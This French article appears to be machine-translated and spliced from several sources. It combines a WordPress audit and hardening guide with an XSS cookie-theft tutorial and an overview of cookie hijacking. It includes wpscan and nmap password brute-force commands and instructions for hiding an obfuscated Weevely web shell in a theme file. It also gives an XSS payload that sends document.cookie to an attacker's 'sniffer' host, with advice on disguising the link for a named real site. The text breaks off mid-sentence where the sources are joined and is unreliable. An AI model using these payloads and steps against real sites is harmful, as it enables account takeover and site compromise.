WordPress est une plate-forme de blogs conviviale pour la publication et la gestion d'articles sur laquelle un grand nombre de sites différents sont basés. En raison de sa prévalence, ce CMS a longtemps été une friandise pour les attaquants. Malheureusement, les paramètres par défaut n'offrent pas un niveau de protection suffisant, laissant de nombreux trous par défaut découverts. Dans cet article, nous allons parcourir le cheminement typique d'un piratage "typique" d'un site WordPress, et montrer également comment corriger les vulnérabilités identifiées.

Introduction

WordPress est le système de gestion de contenu le plus populaire aujourd'hui. Sa part est de 60,4% du nombre total de sites utilisant des moteurs CMS. Parmi ceux-ci, selon les statistiques, 67,3% des sites sont basés sur dernière version donné Logiciel. Pendant ce temps, au cours des douze années d'existence du moteur web, 242 vulnérabilités de toutes sortes y ont été découvertes (hors vulnérabilités trouvées dans des plugins et thèmes tiers). Et les statistiques des modules complémentaires tiers semblent encore plus tristes. Ainsi, la société Revisium a analysé 2350 templates russifiés pour WordPress, issus de diverses sources. En conséquence, ils ont découvert que plus de la moitié (54 %) étaient infectés par des shells Web, des portes dérobées, des liens blackhat seo ("spam"), et contenaient également des scripts présentant des vulnérabilités critiques. Par conséquent, mettez-vous à l'aise, nous allons maintenant découvrir comment auditer un site WordPress et éliminer les lacunes constatées. Nous utiliserons la version 4.1 (russifiée).

Indexation du site

La première étape de tout test consiste généralement à collecter des informations sur la cible. Et cela aide souvent. mauvais réglage l'indexation du site, qui permet aux utilisateurs non autorisés de visualiser le contenu de sections individuelles du site et, par exemple, d'obtenir des informations sur plugins installés et sujets, ainsi que l'accès à des données confidentielles ou sauvegardes bases de données. Pour vérifier quels répertoires sont visibles de l'extérieur, le plus simple est d'utiliser Google. Assez pour performer Requête Google Dorks comme site:example.com intitle:"index of" inurl:/wp-content/ . Dans l'instruction inurl:, vous pouvez spécifier les répertoires suivants :

/wp-content/ /wp-content/langues/plugins /wp-content/langues/themes /wp-content/plugins/ /wp-content/themes/ /wp-content/uploads/

Si vous pouvez voir /wp-content/plugins/ , la prochaine étape de collecte d'informations sur les plugins installés et leurs versions est beaucoup plus facile. Naturellement, vous pouvez désactiver l'indexation à l'aide du fichier robots.txt. Comme il n'est pas inclus par défaut dans le package d'installation de WordPress, vous devez le créer vous-même et le déposer dans le répertoire racine du site. Il existe de nombreux manuels pour créer et travailler avec le fichier robots.txt, je vais donc laisser ce sujet pour l'auto-préparation. Voici juste une des options possibles :

Agent utilisateur : * Interdire : /cgi-bin Interdire : /wp-login.php Interdire : /wp-admin/ Interdire : /wp-includes/ Interdire : /wp-content/ Interdire : /wp-content/plugins/ Interdire : /wp-content/themes/ Interdire : /?author=* Autoriser : /

Si les fichiers stockés dans le dossier uploads contiennent des informations confidentielles, ajoutez la ligne suivante à cette liste : Disallow: /wp-content/uploads/ .
En revanche, dans le fichier robots.txt, il est déconseillé de placer des liens vers des répertoires créés spécifiquement pour stocker des informations sensibles. Sinon, en faisant cela, vous faciliterez la tâche de l'attaquant, car c'est le premier endroit où tout le monde regarde généralement à la recherche de "intéressant".

Déterminer la version de WordPress

Une autre étape importante consiste à identifier Versions du CMS. Sinon, comment choisir le bon sploit ? Il ya trois manière rapide pour déterminer quelle version de WordPress votre site utilise :

1. Retrouver dans code source pages. Il est spécifié dans la balise meta du générateur :

   ou dans les balises :

2. Trouvez-le dans le fichier readme.html (Fig. 1), qui est inclus dans le package d'installation et se trouve à la racine du site. Le fichier peut avoir d'autres noms tels que readme-ja.html .
3. Trouvez dans le fichier ru_RU.po (Fig. 2), qui est inclus dans le package d'installation et situé dans /wp-content/languages/ : "Project-Id-Version: WordPress 4.1.1\n"

Une des options de protection ce cas- restreindre l'accès aux fichiers readme.html et ru_RU.po en utilisant .htaccess .

Automatisation du processus de test

La recherche sur la sécurité de WordPress existe depuis longtemps, il existe donc un nombre suffisant d'outils qui vous permettent d'automatiser les tâches de routine.

• détecter la version et le thème avec le script http-wordpress-info nmap -sV --script http-wordpress-info
• nmap -p80 --script http-wordpress-brute --script-args "userdb=users.txt,passdb=passwords.txt" example.com

• module de détection de version : auxiliaire/scanner/http/wordpress_scanner ;
• module pour déterminer le nom d'utilisateur auxiliaire/scanner/http/wordpress_login_enum .

• énumérer les plugins installés : wpscan --url www.exmple.com --enumerate p ;
• énumérer les thèmes installés : wpscan --url www.exmple.com --enumerate t ;
• énumérer les timthumbs installés : wpscan --url www.example.com --enumerate tt ;
• détection du nom d'utilisateur : wpscan --url www.example.com --enumerate u ;
• deviner le mot de passe du dictionnaire pour l'utilisateur admin : wpscan --url www.example.com --wordlist wordlist.txt --username admin ;
• deviner le mot de passe en utilisant la liaison nom d'utilisateur/mot de passe avec 50 threads : wpscan --url www.example.com --wordlist wordlist.txt --threads 50 .

Identification des composants installés

Collectons maintenant des informations sur les plugins et les thèmes installés, qu'ils soient activés ou non. Tout d'abord, ces informations peuvent être extraites du code source de la page HTML, par exemple, des liens JavaScript, des commentaires et des ressources telles que CSS qui sont chargées sur la page. C'est le moyen le plus simple d'obtenir des informations sur les composants installés. Par exemple, les lignes ci-dessous indiquent le thème vingt-onze utilisé :

Étant donné que les informations sur les plugins ne sont pas toujours affichées dans le code source d'une page HTML, les composants installés peuvent être détectés à l'aide de l'utilitaire WPScan (voir encadré). N'oubliez pas que l'énumération des chemins de plug-in sera enregistrée dans les journaux du serveur Web.
Après avoir reçu des données sur les composants installés, vous pouvez déjà commencer à rechercher des vulnérabilités par vous-même ou trouver des exploits accessibles au public sur des ressources telles que rapid7 ou exploit-db .

Définition du nom d'utilisateur

Par défaut, WordPress attribue à chaque utilisateur un identifiant unique, représenté par un nombre : example.com/?author=1 . En triant les numéros, vous déterminerez les noms des utilisateurs du site. Compte administrateur admin, qui est créé dans le processus Installations WordPress, est le numéro 1, il est donc recommandé de le retirer par mesure de protection.

Brute force wp-login

Connaissant le nom d'utilisateur, vous pouvez essayer de deviner le mot de passe du panneau d'administration. Le formulaire de connexion WordPress sur la page wp-login.php est très informatif (Fig. 3), en particulier pour un attaquant : lors de la saisie de données incorrectes, des indices sur un nom d'utilisateur ou un mot de passe incorrect pour un utilisateur particulier apparaissent. Les développeurs sont conscients de cette fonctionnalité, mais ils ont décidé de la laisser, car de tels messages sont pratiques pour les utilisateurs qui pourraient oublier leur identifiant et/ou leur mot de passe. Le problème de deviner le mot de passe peut être résolu en utilisant mot de passe fort, composé de douze caractères ou plus et comprenant les lettres majuscules et minuscule, chiffres et caractères spéciaux. Ou, par exemple, en utilisant le plugin Login LockDown.

Verser la coque

Après avoir réinitialisé le mot de passe, rien ne nous empêche de télécharger un shell sur une ressource Web compromise. À ces fins, le framework Weevely est tout à fait approprié, ce qui vous permet de générer un shell sous une forme obscurcie, ce qui le rend assez difficile à détecter. Afin de ne pas éveiller les soupçons, le code résultant peut être inséré dans n'importe quel fichier de thème (par exemple, dans index.php) via l'éditeur de thème de la console WordPress. Après cela, en utilisant le même Weevely, vous pouvez vous connecter à la machine de la victime et appeler diverses commandes :

Python weevely.py http://test/index.php Pa$$w0rd [+] weevely 3.1.0 [+] Cible : test [+] Session : _weevely/sessions/test/index_0.session [+] Parcourir le système de fichiers ou exécuter des commandes démarre la connexion [+] à la cible. Tapez : aide pour plus d'informations. weevely> :aide

Connexion .htaccess

Pour empêcher l'accès aux informations sensibles, il est préférable d'utiliser le fichier .htaccess - c'est le fichier de configuration utilisé dans Apache Web Server. Considérez les possibilités de ce fichier du point de vue de la sécurité. Avec lui, vous pouvez : refuser l'accès aux répertoires et aux fichiers, bloquer diverses injections SQL et scripts malveillants. Pour ce faire, le fichier standard .htaccess pour CMS Wordpress 4.1 doit être un peu développé. Pour fermer la liste des fichiers et dossiers, ajoutez :

Options +SuivreSymLinks -Index

RewriteCond %(QUERY_STRING) base64_encode[^(]*\([^)]*\) bloquera les liens contenant l'encodage Base64. Débarrassez-vous des liens contenant la balise si le script a fonctionné et que le message "xss" est apparu, alors la vulnérabilité est présente, si le script n'a pas fonctionné, vous pouvez toujours essayer ">, il s'agit probablement de la vulnérabilité xss la plus courante. Si ni l'un ni l'autre script n'a fonctionné, alors il n'y a probablement pas de vulnérabilité.
Prenons un exemple.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Voir le formulaire "recherche" ? mettez là "> et cliquez sur "trouver"
Une fenêtre avec xss s'est envolée, ce qui signifie que xss est présent. (Peut-être qu'au moment où vous lirez cet article, ce xss sera déjà corrigé)

2.2 XSS actif
Un tel CSS peut être, par exemple, dans les champs de profil, lors de l'ajout de nouvelles au nom des nouvelles et dans les nouvelles elles-mêmes (moins souvent), dans les messages sur les forums/chats/livres d'or avec html activé. Tout est simple ici, on rentre le script du sous-paragraphe précédent dans les champs, et si le message s'affiche à l'écran, alors la vulnérabilité est présente.
Considérez xss dans les balises BB sur les forums.
vous pouvez essayer d'insérer bêtement du code javascript dans la balise, comme ceci :
javascript:alerte('xss')
Certaines balises ont des paramètres, par exemple, la balise a des paramètres dynsrc et lowsrc, essayons de remplacer le code comme ceci :
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Si le script a fonctionné, xss est

3.Utiliser XSS pour voler des cookies
Maintenant le plus délicieux
Afin de voler les cookies, nous avons besoin d'un renifleur Web, vous pouvez installer une sorte de renifleur sur votre hébergement, ou vous pouvez utiliser un renifleur en ligne, qui sont maintenant complets.
Pour voler des cookies via XSS passif, la victime doit suivre un lien toxique. Pour voler des cookies, nous utiliserons à la place un autre script :
nous substituons le script dans le lien et laissons la victime le suivre, voir le journal du renifleur et se réjouir.
Prenons un exemple.
Prenons ce XSS sur le randonneur du paragraphe précédent.
Pâte
">
dans le formulaire de recherche, cliquez sur "trouver", regardez la barre d'adresse et voyez :

http://miss.rambler.ru/srch/?sort=0& … &words =">
Nous jetons ce lien à la victime et profitons des cookies.
En voyant un tel lien, la victime peut se douter de quelque chose, il est donc conseillé d'encoder
">
dans l'URL Ou utilisez des services comme http://tinyurl.com/
Passons au XSS actif, tout est simple ici, à la place de alert() on insère img = new Image();img.src = "sniffer image address"+document.cookie;

Maintenant, nous avons des cookies. Mais que faire d'eux ? C'est simple, il faut les remplacer par les leurs. À Navigateur Opera il y a un éditeur de cookies intégré (outils-> avancé-> gestion des cookies), il y a un plugin pour firefox (je ne me souviens plus du nom, utilisez google)
C'est tout pour l'instant, peut-être que l'article sera complété

L'image montre que le cookie contient la chaîne wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Cette valeur se présente sous une forme non cryptée dans un cookie et est facile à intercepter à l'aide de l'utilitaire Achilles, mais en règle générale, dans la plupart des cas, seul le hachage d'une entrée particulière peut être vu dans Achilles. Avant d'envoyer une requête au serveur, vous pouvez essayer de remplacer cette chaîne par une chaîne similaire (bien que dans ce cas cela n'ait aucun sens) - le nombre de tentatives n'est pas limité. Ensuite, en envoyant cette requête au serveur à l'aide du bouton Envoyer, vous pouvez obtenir une réponse du serveur, à destination de l'administrateur.

Dans l'exemple précédent, vous pouvez utiliser l'usurpation directe d'ID utilisateur. De plus, le nom du paramètre dont la substitution de valeur fournit caractéristiques supplémentaires hacker, peut être : utilisateur (par exemple, USER=JDOE), toute expression avec une chaîne d'identification (par exemple, USER=JDOE ou SESSIONID=BLAHBLAH), admin (par exemple, ADMIN=TRUE), session (par exemple, SESSION =ACTIVE), cart (par exemple, CART=FULL), ainsi que des expressions telles que TRUE, FALSE, ACTIVE, INACTIVE. Typiquement, le format des cookies est très dépendant de l'application pour laquelle ils sont utilisés. Cependant, ces conseils pour trouver des failles d'application avec les cookies fonctionnent pour presque tous les formats.

Contre-mesures contre l'extraction d'informations à partir de cookies effectuées côté client

À cas général l'utilisateur doit se méfier des sites Web qui utilisent des cookies pour l'authentification et le stockage de données sensibles. Vous devez également vous rappeler qu'un site Web qui utilise des cookies pour l'authentification doit prendre en charge au moins Protocole SSL de crypter le nom d'utilisateur et le mot de passe, car en l'absence de ce protocole, les données sont transmises sous forme non cryptée, ce qui permet de les intercepter de la manière la plus simple Logiciel pour afficher les données envoyées sur le réseau.

Kookaburra Software a développé un outil pour faciliter l'utilisation des cookies. L'outil s'appelle CookiePal ( http://www.kburra.com/cpal.html (Voir www.kburra.com)). Ce programme est destiné à alerter l'utilisateur lorsqu'un site Web tente d'installer un cookie sur une machine, et l'utilisateur peut choisir d'autoriser ou de refuser cette action. Caractéristiques similaires Le blocage des cookies est désormais disponible dans tous les navigateurs.

Une autre raison d'installer régulièrement des mises à jour de navigateur Web est que des failles de sécurité dans ces programmes sont constamment découvertes. Par exemple, Bennet Haselton et Jamie McCarthy ont créé un script qui récupère les cookies de la machine d'un client lorsqu'un lien est cliqué. En conséquence, tout le contenu des cookies qui se trouvent sur la machine de l'utilisateur devient disponible.

Ce genre de hack peut aussi être fait avec le descripteur

Afin d'éviter que de telles choses ne menacent nos données personnelles, je le fais moi-même et je conseille à chacun de toujours mettre à jour les logiciels qui fonctionnent avec du code HTML (clients de messagerie, lecteurs multimédias, navigateurs, etc.).

De nombreuses personnes préfèrent simplement bloquer les cookies, cependant, la plupart des sites Web nécessitent des cookies pour pouvoir naviguer. Conclusion - si dans un avenir proche, il y aura une technologie innovante qui vous permettra de vous passer des cookies, les programmeurs et les administrateurs pousseront un soupir de soulagement, mais pour l'instant les cookies restent un morceau savoureux pour un hacker ! C'est vrai, car une meilleure alternative n'existe pas encore.

Contre-mesures côté serveur

Dans le cas des recommandations de sécurité des serveurs, les experts donnent un conseil simple : n'utilisez le mécanisme des cookies qu'en cas d'absolue nécessité ! Une attention particulière doit être portée lors de l'utilisation de cookies qui restent sur le système de l'utilisateur après la fin de la session.

Bien sûr, il est important de comprendre que les cookies peuvent être utilisés pour sécuriser les serveurs Web afin d'autoriser les utilisateurs. Si l'application que vous développez a besoin d'utiliser des cookies, alors ce mécanisme doit être configuré de manière à ce que différentes clés avec une courte période de validité soient utilisées pour chaque session, et essayez également de ne pas mettre d'informations dans ces fichiers qui peuvent être utilisées par des pirates pour le piratage (comme ADMIN=TRUE).

De plus, pour assurer une plus grande sécurité lors du travail avec biscuits vous pouvez utiliser leur cryptage pour empêcher l'extraction une information important. Bien sûr, le cryptage ne résout pas tous les problèmes de sécurité avec la technologie des cookies, mais cette méthode empêchera les piratages les plus simples décrits ci-dessus.

Biscuits - informations dans le formulaire fichier texte, stockées sur l'ordinateur de l'utilisateur par le site Web. Contient des données d'authentification (login/mot de passe, ID, numéro de téléphone, adresse boites aux lettres), paramètres utilisateur, statut d'accès. Stocké dans le profil du navigateur.

Pirater les cookies est le vol (ou "détournement") de la session d'un visiteur sur une ressource Web. Les informations secrètes deviennent disponibles non seulement pour l'expéditeur et le destinataire, mais également pour un tiers - la personne qui a intercepté.

Outils et techniques de piratage de cookies

Les voleurs d'ordinateurs, comme leurs collègues dans la vraie vie, en plus des compétences, de la dextérité et des connaissances, ont bien sûr leurs propres outils - une sorte d'arsenal de passe-partout et de sondes. Faisons connaissance avec les astuces les plus populaires des pirates, qu'ils utilisent pour repêcher les cookies des habitants d'Internet.

Renifleurs

Programmes spéciaux pour le suivi et l'analyse trafic réseau. Leur nom vient du verbe anglais "sniff" (renifler), parce que. littéralement "détecter" les paquets transmis entre les nœuds.

Mais les attaquants utilisent un renifleur pour intercepter les données de session, les messages et autres information confidentielle. L'objet de leurs attaques sont principalement des réseaux non sécurisés, où les cookies sont envoyés dans une session HTTP ouverte, c'est-à-dire qu'ils ne sont pratiquement pas cryptés. (Le Wi-Fi public est le plus vulnérable.)

Les méthodes suivantes sont utilisées pour injecter un renifleur dans le canal Internet entre l'hôte de l'utilisateur et le serveur Web :

• « écoute » des interfaces réseau (hubs, switchs) ;
• branchement et copie du trafic ;
• connexion à la rupture du canal réseau;
• analyse via des attaques spéciales qui redirigent le trafic de la victime vers un renifleur (MAC-spoofing, IP-spoofing).

L'abréviation XSS signifie Cross Site Scripting. Il est utilisé pour attaquer les sites Web afin de voler les données des utilisateurs.

Le fonctionnement de XSS est le suivant :

• un attaquant injecte un code malveillant (un script masqué spécial) sur une page Web d'un site, d'un forum ou dans un message (par exemple, lors d'un chat sur un réseau social) ;
• la victime entre dans une page infectée et active le code installé sur son PC (clique, suit un lien, etc.) ;
• à son tour, le code malveillant activé "extrait" les données confidentielles de l'utilisateur du navigateur (notamment les cookies) et les envoie au serveur Web de l'attaquant.

Afin « d'implanter » un mécanisme logiciel XSS, les pirates utilisent toutes sortes de vulnérabilités dans les serveurs Web, les services en ligne et les navigateurs.

Toutes les vulnérabilités XSS sont divisées en deux types :

• Passif. L'attaque est obtenue en interrogeant un script de page Web spécifique. Code malicieux peuvent être saisis sous diverses formes sur une page Web (par exemple, dans une barre de recherche sur un site). Les plus sensibles au XSS passif sont les ressources qui ne filtrent pas les balises HTML lorsque les données arrivent ;
• Actif. Situé directement sur le serveur. Et ils sont activés dans le navigateur de la victime. Ils sont activement utilisés par les escrocs dans divers blogs, chats et flux d'actualités.

Les pirates "camouflent" soigneusement leurs scripts XSS afin que la victime ne se doute de rien. Ils changent l'extension du fichier, font passer le code comme une image, les motivent à suivre le lien, les attirent avec un contenu intéressant. En conséquence: un utilisateur de PC qui n'a pas fait face à sa propre curiosité envoie de sa propre main (avec un clic de souris) des cookies de session (avec un identifiant et un mot de passe!) À l'auteur du script XSS - un méchant informatique.

Usurpation de cookies

Tous les cookies sont stockés et envoyés au serveur Web (d'où ils "proviennent") sans aucune modification - dans leur forme d'origine - avec les mêmes valeurs, chaînes et autres données. La modification intentionnelle de leurs paramètres est appelée cookie spoofing. En d'autres termes, lorsqu'un cookie est usurpé, l'attaquant est un vœu pieux. Par exemple, lors d'un paiement dans une boutique en ligne, le montant du paiement est modifié dans le cookie vers un côté plus petit - il y a donc une « économie » sur les achats.

Les cookies de session volés sur un réseau social depuis le compte de quelqu'un d'autre sont « insérés » dans une autre session et sur un autre PC. Le propriétaire des cookies volés obtient un accès complet au compte de la victime (correspondance, contenu, paramètres de la page) tant qu'elle est sur sa page.

Les cookies "d'édition" s'effectuent à l'aide de :

• les fonctions " Gestion des cookies... " dans le navigateur Opera ;
• modules complémentaires Cookies Manager et Advanced Cookie Manager pour FireFox ;
• Utilitaire IECookiesView (uniquement pour Internet Explorer);
• éditeur de texte comme AkelPad, NotePad ou bloc-notes Windows.

Accès physique aux données

Très circuits simples la mise en œuvre comporte plusieurs étapes. Mais il n'est efficace que si l'ordinateur de la victime avec une session ouverte, par exemple, Vkontakte, est laissé sans surveillance (et pendant assez longtemps !) :

1. Entrez dans la barre d'adresse du navigateur fonction javascript, qui affiche tous les cookies enregistrés.
2. Après avoir appuyé sur "ENTER", ils apparaissent tous sur la page.
3. Les cookies sont copiés, enregistrés dans un fichier, puis transférés sur une clé USB.
4. Sur un autre PC, les cookies sont remplacés dans une nouvelle session.
5. L'accès au compte de la victime est ouvert.

En règle générale, les pirates utilisent les outils ci-dessus (+ autres) à la fois en combinaison (car le niveau de protection sur de nombreuses ressources Web est assez élevé) et séparément (lorsque les utilisateurs sont trop naïfs).

XSS + renifleur

1. Un script XSS est créé, qui spécifie l'adresse du renifleur en ligne (de sa propre production ou d'un service spécifique).
2. Le code malveillant est enregistré avec l'extension .img (format image).
3. Ensuite, ce fichier est téléchargé sur la page du site, le chat ou le message personnel - où l'attaque sera effectuée.
4. L'attention de l'utilisateur est attirée sur le "piège" créé (ici l'ingénierie sociale entre en jeu).
5. Si le "piège" fonctionne, les cookies du navigateur de la victime sont interceptés par le renifleur.
6. Le pirate ouvre les journaux du renifleur et extrait les cookies volés.
7. Ensuite, il effectue une substitution pour obtenir les droits du titulaire du compte à l'aide des outils ci-dessus.

Protection des cookies contre le piratage

1. Utilisez une connexion cryptée (en utilisant des protocoles et des méthodes de sécurité appropriés).
2. Ne répondez pas aux liens douteux, aux images, aux offres alléchantes pour vous familiariser avec les "nouveaux logiciels libres". Surtout de la part d'inconnus.
3. N'utilisez que des ressources Web fiables.
4. Terminez une session autorisée en appuyant sur le bouton "Déconnexion" (et pas simplement en fermant l'onglet !). Surtout si le compte n'a pas été connecté à partir d'un ordinateur personnel, mais, par exemple, à partir d'un PC dans un cybercafé.
5. N'utilisez pas la fonction "Enregistrer le mot de passe" de votre navigateur. Les données d'enregistrement stockées augmentent parfois le risque de vol. Ne soyez pas paresseux, ne ménagez pas quelques minutes de temps pour saisir un mot de passe et vous connecter au début de chaque session.
6. Après avoir navigué sur le Web - visité des réseaux sociaux, des forums, des chats, des sites - supprimez les cookies enregistrés et videz le cache du navigateur.
7. Mettez régulièrement à jour les navigateurs et les logiciels antivirus.
8. Utilisez des extensions de navigateur qui protègent contre les attaques XSS (par exemple, NoScript pour FF et Google Chrome).
9. Périodiquement dans les comptes.

Et surtout - ne perdez pas votre vigilance et votre attention lorsque vous vous détendez ou travaillez sur Internet !